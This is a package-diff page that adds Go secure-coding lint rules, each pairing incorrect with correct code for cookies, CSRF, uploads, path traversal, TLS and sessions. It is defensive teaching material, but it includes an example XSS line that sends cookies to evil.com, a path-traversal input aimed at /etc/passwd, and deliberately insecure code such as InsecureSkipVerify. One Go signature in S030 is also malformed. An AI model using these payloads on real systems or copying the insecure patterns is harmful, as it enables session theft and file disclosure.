npm - @sun-asterisk/sunlint - Versions diffs - 1.3.40 → 1.3.41 - Mend

@sun-asterisk/sunlint 1.3.40 → 1.3.41

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (67) hide show

package/skill-assets/sunlint-code-quality/rules/go/S028-upload-limits.md ADDED Viewed

@@ -0,0 +1,58 @@
+---
+title: Limit Upload File Size And Count
+impact: MEDIUM
+impactDescription: prevents denial of service attacks
+tags: upload, file-size, dos, limits, security
+---
+## Limit Upload File Size And Count
+Unlimited uploads can exhaust disk space and memory, causing denial of service.
+**Incorrect (no limits):**
+```go
+func UploadHandler(w http.ResponseWriter, r *http.Request) {
+    r.ParseMultipartForm(32 << 20) // 32MB in memory, but no total limit
+    file, _, _ := r.FormFile("file")
+}
+```
+**Correct (enforce limits):**
+```go
+func UploadHandler(w http.ResponseWriter, r *http.Request) {
+    // 1. Limit total request body size
+    r.Body = http.MaxBytesReader(w, r.Body, 5<<20) // 5MB limit
+    err := r.ParseMultipartForm(5 << 20)
+    if err != nil {
+        http.Error(w, "File too large or invalid request", http.StatusRequestEntityTooLarge)
+        return
+    }
+    // 2. Validate file type
+    file, header, _ := r.FormFile("file")
+    buffer := make([]byte, 512)
+    file.Read(buffer)
+    contentType := http.DetectContentType(buffer)
+    allowedTypes := map[string]bool{
+        "image/jpeg": true,
+        "image/png":  true,
+        "application/pdf": true,
+    }
+    if !allowedTypes[contentType] {
+        http.Error(w, "Invalid file type", 400)
+        return
+    }
+}
+```
+**Recommended limits:**
+- Images: 5-10MB
+- Documents: 10-50MB
+- Max total request size: 100MB
+**Tools:** `http.MaxBytesReader`, NGINX `client_max_body_size`

package/skill-assets/sunlint-code-quality/rules/go/S029-csrf-protection.md ADDED Viewed

@@ -0,0 +1,53 @@
+---
+title: Apply CSRF Protection
+impact: HIGH
+impactDescription: prevents cross-site request forgery attacks
+tags: csrf, tokens, forms, security
+---
+## Apply CSRF Protection
+CSRF attacks force authenticated users to perform unintended actions in a web application in which they're currently authenticated.
+**Incorrect (no CSRF protection):**
+```html
+<!-- No CSRF token - vulnerable if using cookie-based auth -->
+<form action="/transfer" method="POST">
+  <input name="amount" value="1000">
+  <button>Transfer</button>
+</form>
+```
+**Correct (CSRF protection using gorilla/csrf):**
+```go
+import "github.com/gorilla/csrf"
+func main() {
+    CSRF := csrf.Protect([]byte("32-byte-long-auth-key"))
+    http.ListenAndServe(":8000", CSRF(r))
+}
+func TransferHandler(w http.ResponseWriter, r *http.Request) {
+    // Pass the token to the template
+    w.Header().Set("X-CSRF-Token", csrf.Token(r))
+    // r.FormValue("gorilla.csrf.Token") is also checked automatically
+}
+```
+```html
+<form action="/transfer" method="POST">
+  <!-- Use a hidden field for the token -->
+  <input type="hidden" name="gorilla.csrf.Token" value="{{ .csrfToken }}">
+  <input name="amount">
+  <button>Transfer</button>
+</form>
+```
+**Defense Depth:**
+- Use `SameSite=Strict` or `Lax` for cookies.
+- Use `Authorization: Bearer` (not cookies) for APIs.
+- Custom headers (e.g., `X-Requested-With`) for AJAX.
+**Tools:** `gorilla/csrf`, `nosurf`, SameSite cookies

package/skill-assets/sunlint-code-quality/rules/go/S030-directory-browsing.md ADDED Viewed

@@ -0,0 +1,53 @@
+---
+title: Disable Directory Browsing
+impact: MEDIUM
+impactDescription: prevents file enumeration
+tags: directory, listing, file-exposure, security
+---
+## Disable Directory Browsing
+Directory listing exposes file structure and potentially sensitive files.
+**Incorrect (directory listing enabled):**
+```go
+// http.FileServer enables directory listing by default
+// if index.html is missing.
+http.Handle("/static/", http.StripPrefix("/static/", http.FileServer(http.Dir("./public"))))
+```
+**Correct (directory listing disabled):**
+```go
+type neuteredFileSystem struct {
+    fs http.FileSystem
+}
+func (nfs neuteredFileSystem) Open(path string) (http.File(f), error) {
+    f, err := nfs.fs.Open(path)
+    if err != nil {
+        return nil, err
+    }
+    s, err := f.Stat()
+    if s.IsDir() {
+        index := filepath.Join(path, "index.html")
+        if _, err := nfs.fs.Open(index); err != nil {
+            closeErr := f.Close()
+            if closeErr != nil {
+                return nil, closeErr
+            }
+            return nil, err
+        }
+    }
+    return f, nil
+}
+// Usage
+fs := neuteredFileSystem{http.Dir("./public")}
+http.Handle("/static/", http.StripPrefix("/static/", http.FileServer(fs)))
+```
+**Tools:** Web server configuration, Custom `FileSystem` implementation

package/skill-assets/sunlint-code-quality/rules/go/S031-secure-cookie-flag.md ADDED Viewed

@@ -0,0 +1,48 @@
+---
+title: Set Secure Flag On Session Cookies
+impact: HIGH
+impactDescription: prevents cookie theft over unencrypted connections
+tags: cookies, secure, https, session, security
+---
+## Set Secure Flag On Session Cookies
+Without the Secure flag, cookies can be sent over unencrypted HTTP connections.
+**Incorrect (no Secure flag):**
+```go
+cookie := &http.Cookie{
+    Name:  "session",
+    Value: token,
+}
+http.SetCookie(w, cookie) // No Secure flag!
+```
+**Correct (Secure flag set):**
+```go
+cookie := &http.Cookie{
+    Name:     "session",
+    Value:    token,
+    Secure:   true,     // HTTPS only
+    HttpOnly: true,
+    SameSite: http.SameSiteStrictMode,
+}
+http.SetCookie(w, cookie)
+```
+**Production enforcement:**
+```go
+isProduction := os.Getenv("ENV") == "production"
+cookie := &http.Cookie{
+    Name:     "session",
+    Value:    token,
+    Secure:   isProduction,
+    HttpOnly: true,
+}
+```
+**Tools:** `http.Cookie`, Security headers Audit

package/skill-assets/sunlint-code-quality/rules/go/S032-httponly-cookie.md ADDED Viewed

@@ -0,0 +1,42 @@
+---
+title: Set HttpOnly On Session Cookies
+impact: MEDIUM
+impactDescription: prevents cookie theft via XSS
+tags: cookies, httponly, xss, session, security
+---
+## Set HttpOnly On Session Cookies
+Without HttpOnly, JavaScript can read cookie values, enabling XSS attacks to steal sessions.
+**Incorrect (no HttpOnly):**
+```go
+cookie := &http.Cookie{
+    Name:  "session",
+    Value: token,
+}
+// Default HttpOnly is false
+```
+**Correct (HttpOnly set):**
+```go
+cookie := &http.Cookie{
+    Name:     "session",
+    Value:    token,
+    HttpOnly: true, // Not accessible to JavaScript
+    Secure:   true,
+}
+http.SetCookie(w, cookie)
+```
+**XSS attack example (prevented by HttpOnly):**
+```javascript
+// Attacker's XSS payload (blocked by HttpOnly)
+fetch('https://evil.com/steal?cookie=' + document.cookie);
+// With HttpOnly, session cookie is NOT in document.cookie
+```
+**Tools:** Browser DevTools, OWASP ZAP, `http.Cookie`

package/skill-assets/sunlint-code-quality/rules/go/S033-samesite-cookie.md ADDED Viewed

@@ -0,0 +1,49 @@
+---
+title: Set SameSite On Session Cookies
+impact: MEDIUM
+impactDescription: provides CSRF protection
+tags: cookies, samesite, csrf, session, security
+---
+## Set SameSite On Session Cookies
+SameSite attribute prevents cookies from being sent in cross-site requests, providing CSRF protection.
+**Incorrect (no SameSite):**
+```go
+cookie := &http.Cookie{
+    Name:  "session",
+    Value: token,
+}
+// Default SameSite might be 0 (none/browser default)
+```
+**Correct (SameSite set):**
+```go
+// Strict - most secure
+cookie := &http.Cookie{
+    Name:     "session",
+    Value:    token,
+    SameSite: http.SameSiteStrictMode,
+    HttpOnly: true,
+    Secure:   true,
+}
+// Lax - allows top-level navigation (clicking links)
+cookie := &http.Cookie{
+    Name:     "session",
+    Value:    token,
+    SameSite: http.SameSiteLaxMode,
+}
+```
+**SameSite options in Go:**
+- `http.SameSiteStrictMode`
+- `http.SameSiteLaxMode`
+- `http.SameSiteNoneMode` (requires `Secure: true`)
+**Recommended:** `http.SameSiteStrictMode` for session cookies.
+**Tools:** Browser DevTools, Security Scan

package/skill-assets/sunlint-code-quality/rules/go/S034-host-prefix-cookie.md ADDED Viewed

@@ -0,0 +1,44 @@
+---
+title: Use __Host- Prefix For Cookies
+impact: MEDIUM
+impactDescription: ensures cookie is domain-locked
+tags: cookies, prefix, domain, security
+---
+## Use __Host- Prefix For Cookies
+The `__Host-` prefix ensures cookies are only sent to the exact host, preventing subdomain attacks.
+**Incorrect (no prefix):**
+```go
+cookie := &http.Cookie{
+    Name:   "session",
+    Value:  token,
+    Secure: true,
+    Path:   "/",
+}
+// Cookie could be set by subdomain attacker
+```
+**Correct (__Host- prefix):**
+```go
+cookie := &http.Cookie{
+    Name:     "__Host-session",
+    Value:    token,
+    Secure:   true,
+    Path:     "/",
+    HttpOnly: true,
+    SameSite: http.SameSiteStrictMode,
+    // Domain must NOT be set for __Host-
+}
+```
+**__Host- requirements:**
+- Must have `Secure: true`
+- Must have `Path: "/"`
+- Must NOT have `Domain` attribute set
+- Cannot be set from a subdomain
+**Tools:** Browser DevTools, Security Audit

package/skill-assets/sunlint-code-quality/rules/go/S035-app-hostnames.md ADDED Viewed

@@ -0,0 +1,50 @@
+---
+title: Host Apps On Different Hostnames
+impact: MEDIUM
+impactDescription: provides cookie and origin isolation
+tags: hostname, isolation, same-origin, security
+---
+## Host Apps On Different Hostnames
+Different applications on the same hostname can access each other's cookies and storage.
+**Incorrect (shared hostname):**
+```
+https://example.com/admin    # Admin panel
+https://example.com/api      # API
+https://example.com/app      # User app
+# All share cookies and localStorage!
+```
+**Correct (separate hostnames):**
+```
+https://admin.example.com    # Admin panel
+https://api.example.com      # API
+https://app.example.com      # User app
+# Each has isolated cookies and storage
+```
+**Benefits:**
+- Cookie isolation
+- localStorage isolation
+- Same-origin policy protection
+**Configuration in Go (CORS example):**
+```go
+import "github.com/rs/cors"
+mux := http.NewServeMux()
+handler := cors.New(cors.Options{
+    AllowedOrigins: []string{
+        "https://app.example.com",
+        "https://admin.example.com",
+    },
+    AllowCredentials: true,
+}).Handler(mux)
+```
+**Tools:** Infrastructure Planning, Security Audit

package/skill-assets/sunlint-code-quality/rules/go/S036-internal-file-paths.md ADDED Viewed

@@ -0,0 +1,56 @@
+---
+title: Use Internal Data For File Paths
+impact: CRITICAL
+impactDescription: prevents path traversal attacks
+tags: file-path, path-traversal, lfi, input-validation, security
+---
+## Use Internal Data For File Paths
+Never construct file paths using user input directly. Path traversal attacks can access any file on the system.
+**Incorrect (user-controlled paths):**
+```go
+// Path traversal vulnerability
+func DownloadHandler(w http.ResponseWriter, r *http.Request) {
+    filename := r.URL.Query().Get("file")
+    http.ServeFile(w, r, "/uploads/"+filename)
+    // Attacker: ?file=../../../etc/passwd
+}
+```
+**Correct (validated internal paths):**
+```go
+import (
+    "path/filepath"
+    "strings"
+)
+func DownloadHandler(w http.ResponseWriter, r *http.Request) {
+    filename := r.URL.Query().Get("file")
+    // 1. Sanitize: get only the filename
+    safeName := filepath.Base(filename)
+    // 2. Validate against allowlist (e.g., from DB)
+    if !isUserFile(r.Context().Value("userId").(string), safeName) {
+        http.Error(w, "File not found", 404)
+        return
+    }
+    // 3. Construct absolute path and verify prefix
+    uploadDir := "/abs/path/to/uploads"
+    finalPath := filepath.Join(uploadDir, safeName)
+    if !strings.HasPrefix(finalPath, uploadDir) {
+        http.Error(w, "Invalid path", 400)
+        return
+    }
+    http.ServeFile(w, r, finalPath)
+}
+```
+**Tools:** `filepath.Base`, `filepath.Join`, `gosec` (G304)

package/skill-assets/sunlint-code-quality/rules/go/S037-anti-cache-headers.md ADDED Viewed

@@ -0,0 +1,43 @@
+---
+title: Set Anti-cache Headers
+impact: MEDIUM
+impactDescription: prevents sensitive data caching
+tags: headers, cache, sensitive-data, security
+---
+## Set Anti-cache Headers
+Sensitive pages cached in browsers or proxies can be accessed by other users on shared machines.
+**Incorrect (no cache control):**
+```go
+func AccountHandler(w http.ResponseWriter, r *http.Request) {
+    json.NewEncoder(w).Encode(sensitiveData)
+    // May be cached!
+}
+```
+**Correct (anti-cache headers):**
+```go
+func noCache(next http.Handler) http.Handler {
+    return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+        w.Header().Set("Cache-Control", "no-store, no-cache, must-revalidate, private")
+        w.Header().Set("Pragma", "no-cache")
+        w.Header().Set("Expires", "0")
+        next.ServeHTTP(w, r)
+    })
+}
+// Usage in router
+mux.Handle("/api/account", noCache(http.HandlerFunc(AccountHandler)))
+```
+**When to use anti-cache:**
+- Account pages
+- Financial data
+- Personal information (PII)
+- Any authenticated content
+**Tools:** Security Headers, Browser DevTools

package/skill-assets/sunlint-code-quality/rules/go/S039-tls-certificate-validation.md ADDED Viewed

@@ -0,0 +1,41 @@
+---
+title: TLS Clients Must Validate Server Certificates
+impact: CRITICAL
+impactDescription: prevents man-in-the-middle attacks
+tags: tls, certificates, validation, mitm, security
+---
+## TLS Clients Must Validate Server Certificates
+Disabling certificate validation makes TLS useless - attackers can intercept all traffic using self-signed or forged certificates.
+**Incorrect (disabled validation):**
+```go
+// DANGEROUS: Skipping verification
+tr := &http.Transport{
+    TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
+}
+client := &http.Client{Transport: tr}
+```
+**Correct (proper validation):**
+```go
+// Default behavior - validates certificates against system root CAs
+resp, err := http.Get("https://api.example.com")
+// Custom CA for internal services
+caCert, _ := os.ReadFile("internal-ca.crt")
+caCertPool := x509.NewCertPool()
+caCertPool.AppendCertsFromPEM(caCert)
+tr := &http.Transport{
+    TLSClientConfig: &tls.Config{
+        RootCAs: caCertPool,
+    },
+}
+client := &http.Client{Transport: tr}
+```
+**Tools:** `crypto/tls`, `crypto/x509`, `gosec` (G402)

package/skill-assets/sunlint-code-quality/rules/go/S041-logout-invalidation.md ADDED Viewed

@@ -0,0 +1,46 @@
+---
+title: Invalidate Session On Logout
+impact: MEDIUM
+impactDescription: ensures logout actually terminates access
+tags: session, logout, invalidation, security
+---
+## Invalidate Session On Logout
+If sessions/tokens persist after logout, they can be stolen and used by attackers.
+**Incorrect (client-only logout):**
+```go
+// Server doesn't invalidate session - just returns success
+func LogoutHandler(w http.ResponseWriter, r *http.Request) {
+    w.WriteHeader(http.StatusOK) // Token/Session still valid on server!
+}
+```
+**Correct (server-side invalidation):**
+```go
+func LogoutHandler(w http.ResponseWriter, r *http.Request) {
+    // 1. Destroy server-side session (e.g., in Redis)
+    sessionID := getSessionID(r)
+    sessionStore.Delete(sessionID)
+    // 2. Clear cookie
+    cookie := &http.Cookie{
+        Name:     "session",
+        Value:    "",
+        Path:     "/",
+        HttpOnly: true,
+        Secure:   true,
+        MaxAge:   -1, // Delete immediately
+    }
+    http.SetCookie(w, cookie)
+    // 3. Prevent caching of sensitive logout confirmation
+    w.Header().Set("Cache-Control", "no-store, no-cache, must-revalidate")
+    w.WriteHeader(http.StatusOK)
+}
+```
+**Tools:** Session management libraries, JWT Blacklisting

package/skill-assets/sunlint-code-quality/rules/go/S042-long-lived-sessions.md ADDED Viewed

@@ -0,0 +1,58 @@
+---
+title: Re-authenticate For Long-lived Sessions
+impact: MEDIUM
+impactDescription: ensures continuous user identity verification
+tags: session, authentication, timeout, reauthentication, security
+---
+## Re-authenticate For Long-lived Sessions
+Long-running sessions may be hijacked. Periodic re-authentication ensures the original user is still present.
+**Incorrect (sessions never expire or stay valid indefinitely):**
+```go
+// Session cookie created without expiry or with extremely long duration
+cookie := &http.Cookie{
+    Name:  "session",
+    Value: token,
+} // Defaults to session-only browsers, but logic may never check "age" on server
+```
+**Correct (periodic re-authentication/expiry):**
+```go
+const SessionMaxAge = 24 * time.Hour
+const ReauthInterval = 4 * time.Hour
+func authMiddleware(next http.Handler) http.Handler {
+    return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+        session := getSession(r)
+        // Check if session is too old
+        if time.Since(session.CreatedAt) > SessionMaxAge {
+            http.Error(w, "Session expired", 401)
+            return
+        }
+        // Check if re-authentication is required for sensitive routes
+        if time.Since(session.LastAuthenticatedAt) > ReauthInterval {
+            session.RequireReauth = true
+        }
+        next.ServeHTTP(w, r)
+    })
+}
+// Handler for sensitive operation
+func SensitiveHandler(w http.ResponseWriter, r *http.Request) {
+    session := getSession(r)
+    if session.RequireReauth {
+         http.Error(w, "Re-authentication required", 401)
+         return
+    }
+    // ...
+}
+```
+**Tools:** Session libraries (e.g., `scs`, `gorilla/sessions`), Manual review